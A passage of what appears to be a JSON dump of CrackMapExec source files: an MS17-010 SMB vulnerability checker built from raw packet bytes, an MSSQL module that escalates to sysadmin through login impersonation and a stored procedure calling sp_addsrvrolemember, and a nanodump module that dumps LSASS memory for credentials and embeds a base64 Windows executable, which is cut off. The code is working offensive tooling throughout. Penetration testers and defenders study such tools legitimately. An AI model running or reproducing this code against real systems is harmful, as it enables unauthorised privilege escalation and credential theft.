\"\\x72\",\n \"\\x00\\x00\\x00\\x00\",\n \"\\x18\",\n \"\\x01\\x28\",\n \"\\x00\\x00\",\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\",\n \"\\x00\\x00\",\n \"\\x00\\x00\",\n \"\\x2F\\x4B\",\n \"\\x00\\x00\",\n \"\\xC5\\x5E\",\n ]\n\n negotiate_proto_request = [\n \"\\x00\",\n \"\\x31\\x00\",\n \"\\x02\",\n \"\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x31\\x2E\\x30\\x00\",\n \"\\x02\",\n \"\\x4C\\x4D\\x31\\x2E\\x32\\x58\\x30\\x30\\x32\\x00\",\n \"\\x02\",\n \"\\x4E\\x54\\x20\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x20\\x31\\x2E\\x30\\x00\",\n \"\\x02\",\n \"\\x4E\\x54\\x20\\x4C\\x4D\\x20\\x30\\x2E\\x31\\x32\\x00\",\n ]\n\n return generate_smb_proto_payload(netbios, smb_header, negotiate_proto_request)\n\n\ndef session_setup_andx_request():\n \"\"\"Generate session setuo andx request.\"\"\"\n netbios = [\"\\x00\", \"\\x00\\x00\\x63\"]\n\n smb_header = [\n \"\\xFF\\x53\\x4D\\x42\",\n \"\\x73\",\n \"\\x00\\x00\\x00\\x00\",\n \"\\x18\",\n \"\\x01\\x20\",\n \"\\x00\\x00\",\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\",\n \"\\x00\\x00\",\n \"\\x00\\x00\",\n \"\\x2F\\x4B\",\n \"\\x00\\x00\",\n \"\\xC5\\x5E\",\n ]\n\n session_setup_andx_request = [\n \"\\x0D\",\n \"\\xFF\",\n \"\\x00\",\n \"\\x00\\x00\",\n \"\\xDF\\xFF\",\n \"\\x02\\x00\",\n \"\\x01\\x00\",\n \"\\x00\\x00\\x00\\x00\",\n \"\\x00\\x00\",\n \"\\x00\\x00\",\n \"\\x00\\x00\\x00\\x00\",\n \"\\x40\\x00\\x00\\x00\",\n \"\\x26\\x00\",\n \"\\x00\",\n \"\\x2e\\x00\",\n \"\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x32\\x30\\x30\\x30\\x20\\x32\\x31\\x39\\x35\\x00\",\n \"\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x32\\x30\\x30\\x30\\x20\\x35\\x2e\\x30\\x00\",\n ]\n\n return generate_smb_proto_payload(netbios, smb_header, session_setup_andx_request)\n\n\ndef tree_connect_andx_request(ip, userid):\n \"\"\"Generate tree connect andx request.\"\"\"\n\n netbios = [\"\\x00\", \"\\x00\\x00\\x47\"]\n\n smb_header = [\n \"\\xFF\\x53\\x4D\\x42\",\n \"\\x75\",\n \"\\x00\\x00\\x00\\x00\",\n \"\\x18\",\n \"\\x01\\x20\",\n \"\\x00\\x00\",\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\",\n \"\\x00\\x00\",\n \"\\x00\\x00\",\n \"\\x2F\\x4B\",\n userid,\n \"\\xC5\\x5E\",\n ]\n\n ipc = \"\\\\\\\\{}\\IPC$\\x00\".format(ip)\n\n tree_connect_andx_request = [\n \"\\x04\",\n \"\\xFF\",\n \"\\x00\",\n \"\\x00\\x00\",\n \"\\x00\\x00\",\n \"\\x01\\x00\",\n \"\\x1A\\x00\",\n \"\\x00\",\n ipc.encode(),\n \"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\",\n ]\n\n length = len(\"\".join(smb_header)) + len(\"\".join(tree_connect_andx_request))\n\n netbios[1] = struct.pack(\">L\", length)[-3:]\n\n return generate_smb_proto_payload(netbios, smb_header, tree_connect_andx_request)\n\n\ndef peeknamedpipe_request(treeid, processid, userid, multiplex_id):\n \"\"\"Generate tran2 request\"\"\"\n\n netbios = [\"\\x00\", \"\\x00\\x00\\x4a\"]\n\n smb_header = [\n \"\\xFF\\x53\\x4D\\x42\",\n \"\\x25\",\n \"\\x00\\x00\\x00\\x00\",\n \"\\x18\",\n \"\\x01\\x28\",\n \"\\x00\\x00\",\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\",\n \"\\x00\\x00\",\n treeid,\n processid,\n userid,\n multiplex_id,\n ]\n\n tran_request = [\n \"\\x10\",\n \"\\x00\\x00\",\n \"\\x00\\x00\",\n \"\\xff\\xff\",\n \"\\xff\\xff\",\n \"\\x00\",\n \"\\x00\",\n \"\\x00\\x00\",\n \"\\x00\\x00\\x00\\x00\",\n \"\\x00\\x00\",\n \"\\x00\\x00\",\n \"\\x4a\\x00\",\n \"\\x00\\x00\",\n \"\\x4a\\x00\",\n \"\\x02\",\n \"\\x00\",\n \"\\x23\\x00\",\n \"\\x00\\x00\",\n \"\\x07\\x00\",\n \"\\x5c\\x50\\x49\\x50\\x45\\x5c\\x00\",\n ]\n\n return generate_smb_proto_payload(netbios, smb_header, tran_request)\n\n\ndef trans2_request(treeid, processid, userid, multiplex_id):\n \"\"\"Generate trans2 request.\"\"\"\n\n netbios = [\"\\x00\", \"\\x00\\x00\\x4f\"]\n\n smb_header = [\n \"\\xFF\\x53\\x4D\\x42\",\n \"\\x32\",\n \"\\x00\\x00\\x00\\x00\",\n \"\\x18\",\n \"\\x07\\xc0\",\n \"\\x00\\x00\",\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\",\n \"\\x00\\x00\",\n treeid,\n processid,\n userid,\n multiplex_id,\n ]\n\n trans2_request = [\n \"\\x0f\",\n \"\\x0c\\x00\",\n \"\\x00\\x00\",\n \"\\x01\\x00\",\n \"\\x00\\x00\",\n \"\\x00\",\n \"\\x00\",\n \"\\x00\\x00\",\n \"\\xa6\\xd9\\xa4\\x00\",\n \"\\x00\\x00\",\n \"\\x0c\\x00\",\n \"\\x42\\x00\",\n \"\\x00\\x00\",\n \"\\x4e\\x00\",\n \"\\x01\",\n \"\\x00\",\n \"\\x0e\\x00\",\n \"\\x00\\x00\",\n \"\\x0c\\x00\" + \"\\x00\" * 12,\n ]\n\n return generate_smb_proto_payload(netbios, smb_header, trans2_request)\n\n\ndef check(ip, port=445):\n \"\"\"Check if MS17_010 SMB Vulnerability exists.\"\"\"\n try:\n buffersize = 1024\n timeout = 5.0\n\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.settimeout(timeout)\n client.connect((ip, port))\n\n raw_proto = negotiate_proto_request()\n client.send(raw_proto)\n tcp_response = client.recv(buffersize)\n\n raw_proto = session_setup_andx_request()\n client.send(raw_proto)\n tcp_response = client.recv(buffersize)\n netbios = tcp_response[:4]\n smb_header = tcp_response[4:36]\n smb = SMB_HEADER(smb_header)\n\n user_id = struct.pack(\" User:\n if initial_user.is_sysadmin:\n self.context.log.success(f\"{initial_user.username} is sysadmin\")\n return initial_user\n elif initial_user.dbowner:\n self.context.log.success(f\"{initial_user.username} can privesc via dbowner\")\n return initial_user\n for grantor in user.grantors:\n if grantor.is_sysadmin:\n self.context.log.success(f\"{user.username} can impersonate: \" f\"{grantor.username} (sysadmin)\")\n return grantor\n elif grantor.dbowner:\n self.context.log.success(f\"{user.username} can impersonate: {grantor.username} (which can privesc via dbowner)\")\n return grantor\n else:\n self.context.log.display(f\"{user.username} can impersonate: {grantor.username}\")\n return self.browse_path(context, initial_user, grantor)\n\n def query_and_get_output(self, query):\n # try:\n results = self.mssql_conn.sql_query(query)\n # self.mssql_conn.printRows()\n # query_output = self.mssql_conn._MSSQL__rowsPrinter.getMessage()\n # query_output = results.strip(\"\\n-\")\n return results\n # except Exception as e:\n # return False\n\n def sql_exec_as(self, grantors: list) -> str:\n exec_as = []\n for grantor in grantors:\n exec_as.append(f\"EXECUTE AS LOGIN = '{grantor}';\")\n return \"\".join(exec_as)\n\n def perform_impersonation_check(self, user: User, grantors=[]):\n # build EXECUTE AS if any grantors is specified\n exec_as = self.sql_exec_as(grantors)\n # do we have any privilege ?\n if self.update_priv(user, exec_as):\n return\n # do we have any grantors ?\n new_grantors = self.get_impersonate_users(exec_as)\n for new_grantor in new_grantors:\n # skip the case when we can impersonate ourself\n if new_grantor == user.username:\n continue\n # create a new user and add it as a grantor of the current user\n if new_grantor not in grantors:\n new_user = User(new_grantor)\n new_user.parent = user\n user.grantors.append(new_user)\n grantors.append(new_grantor)\n # perform the same check on the grantor\n self.perform_impersonation_check(new_user, grantors)\n\n def update_priv(self, user: User, exec_as=\"\"):\n if self.is_admin_user(user.username):\n user.is_sysadmin = True\n return True\n user.dbowner = self.check_dbowner_privesc(exec_as)\n return user.dbowner\n\n def get_current_username(self) -> str:\n return self.query_and_get_output(\"select SUSER_NAME()\")[0][\"\"]\n\n def is_admin(self, exec_as=\"\") -> bool:\n res = self.query_and_get_output(exec_as + \"SELECT IS_SRVROLEMEMBER('sysadmin')\")\n self.revert_context(exec_as)\n is_admin = res[0][\"\"]\n self.context.log.debug(f\"IsAdmin Result: {is_admin}\")\n if is_admin:\n self.context.log.debug(f\"User is admin!\")\n self.admin_privs = True\n return True\n else:\n return False\n\n def get_databases(self, exec_as=\"\") -> list:\n res = self.query_and_get_output(exec_as + \"SELECT name FROM master..sysdatabases\")\n self.revert_context(exec_as)\n self.context.log.debug(f\"Response: {res}\")\n self.context.log.debug(f\"Response Type: {type(res)}\")\n tables = [table[\"name\"] for table in res]\n return tables\n\n def is_dbowner(self, database, exec_as=\"\") -> bool:\n query = f\"\"\"select rp.name as database_role\n from [{database}].sys.database_role_members drm\n join [{database}].sys.database_principals rp\n on (drm.role_principal_id = rp.principal_id)\n join [{database}].sys.database_principals mp\n on (drm.member_principal_id = mp.principal_id)\n where rp.name = 'db_owner' and mp.name = SYSTEM_USER\"\"\"\n self.context.log.debug(f\"Query: {query}\")\n res = self.query_and_get_output(exec_as + query)\n self.context.log.debug(f\"Response: {res}\")\n self.revert_context(exec_as)\n if res:\n if \"database_role\" in res[0] and res[0][\"database_role\"] == \"db_owner\":\n return True\n else:\n return False\n return False\n\n def find_dbowner_priv(self, databases, exec_as=\"\") -> list:\n match = []\n for database in databases:\n if self.is_dbowner(database, exec_as):\n match.append(database)\n return match\n\n def find_trusted_db(self, exec_as=\"\") -> list:\n query = \"\"\"SELECT d.name AS DATABASENAME\n FROM sys.server_principals r\n INNER JOIN sys.server_role_members m\n ON r.principal_id = m.role_principal_id\n INNER JOIN sys.server_principals p ON\n p.principal_id = m.member_principal_id\n inner join sys.databases d\n on suser_sname(d.owner_sid) = p.name\n WHERE is_trustworthy_on = 1 AND d.name NOT IN ('MSDB')\n and r.type = 'R' and r.name = N'sysadmin'\"\"\"\n res = self.query_and_get_output(exec_as + query)\n self.revert_context(exec_as)\n return res\n\n def check_dbowner_privesc(self, exec_as=\"\"):\n databases = self.get_databases(exec_as)\n dbowner = self.find_dbowner_priv(databases, exec_as)\n trusted_db = self.find_trusted_db(exec_as)\n # return the first match\n for db in dbowner:\n if db in trusted_db:\n return db\n return None\n\n def do_dbowner_privesc(self, database, exec_as=\"\"):\n # change context if necessary\n self.query_and_get_output(exec_as)\n # use database\n self.query_and_get_output(f\"use {database};\")\n query = f\"\"\"CREATE PROCEDURE sp_elevate_me\n WITH EXECUTE AS OWNER\n as\n begin\n EXEC sp_addsrvrolemember '{self.current_username}','sysadmin'\n end\"\"\"\n self.query_and_get_output(query)\n self.query_and_get_output(\"EXEC sp_elevate_me;\")\n self.query_and_get_output(\"DROP PROCEDURE sp_elevate_me;\")\n self.revert_context(exec_as)\n\n def do_impersonation_privesc(self, username, exec_as=\"\"):\n # change context if necessary\n self.query_and_get_output(exec_as)\n # update our privilege\n self.query_and_get_output(f\"EXEC sp_addsrvrolemember '{username}', 'sysadmin'\")\n self.revert_context(exec_as)\n\n def get_impersonate_users(self, exec_as=\"\") -> list:\n query = \"\"\"SELECT DISTINCT b.name\n FROM sys.server_permissions a\n INNER JOIN sys.server_principals b\n ON a.grantor_principal_id = b.principal_id\n WHERE a.permission_name like 'IMPERSONATE%'\"\"\"\n res = self.query_and_get_output(exec_as + query)\n # self.context.log.debug(f\"Result: {res}\")\n self.revert_context(exec_as)\n users = [user[\"name\"] for user in res]\n return users\n\n def remove_sysadmin_priv(self) -> bool:\n res = self.query_and_get_output(f\"EXEC sp_dropsrvrolemember '{self.current_username}', 'sysadmin'\")\n return not self.is_admin()\n\n def is_admin_user(self, username) -> bool:\n res = self.query_and_get_output(f\"SELECT IS_SRVROLEMEMBER('sysadmin', '{username}')\")\n try:\n if int(res):\n self.admin_privs = True\n return True\n else:\n return False\n except:\n return False\n\n def revert_context(self, exec_as):\n self.query_and_get_output(\"REVERT;\" * exec_as.count(\"EXECUTE\"))\n" }, { "path": "cme/modules/nanodump.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# nanodump module for CME python3\n# author of the module : github.com/mpgn\n# nanodump: https://github.com/helpsystems/nanodump\n\nimport base64\nimport sys\nimport os\nfrom datetime import datetime\nfrom pypykatz.pypykatz import pypykatz\nfrom cme.helpers.bloodhound import add_user_bh\nfrom cme.protocols.mssql.mssqlexec import MSSQLEXEC\n\n\nclass CMEModule:\n name = \"nanodump\"\n description = \"Get lsass dump using nanodump and parse the result with pypykatz\"\n supported_protocols = [\"smb\", \"mssql\"]\n opsec_safe = False\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.connection = None\n self.dir_result = None\n self.tmp_dir = None\n self.useembeded = None\n self.nano = None\n self.nano_path = None\n self.nano_embedded64 = None\n self.tmp_share = None\n self.share = None\n self.context = context\n self.module_options = module_options\n\n def options(self, context, module_options):\n \"\"\"\n TMP_DIR Path where process dump should be saved on target system (default: C:\\\\Windows\\\\Temp\\\\)\n NANO_PATH Path where nano.exe is on your system (default: /tmp/cme/)\n NANO_EXE_NAME Name of the nano executable (default: nano.exe)\n DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = NANO_PATH)\n \"\"\"\n self.context = context\n self.tmp_dir = \"C:\\\\Windows\\\\Temp\\\\\"\n self.share = \"C$\"\n self.tmp_share = self.tmp_dir.split(\":\")[1]\n self.nano_embedded64 = base64.b64decode(\n \"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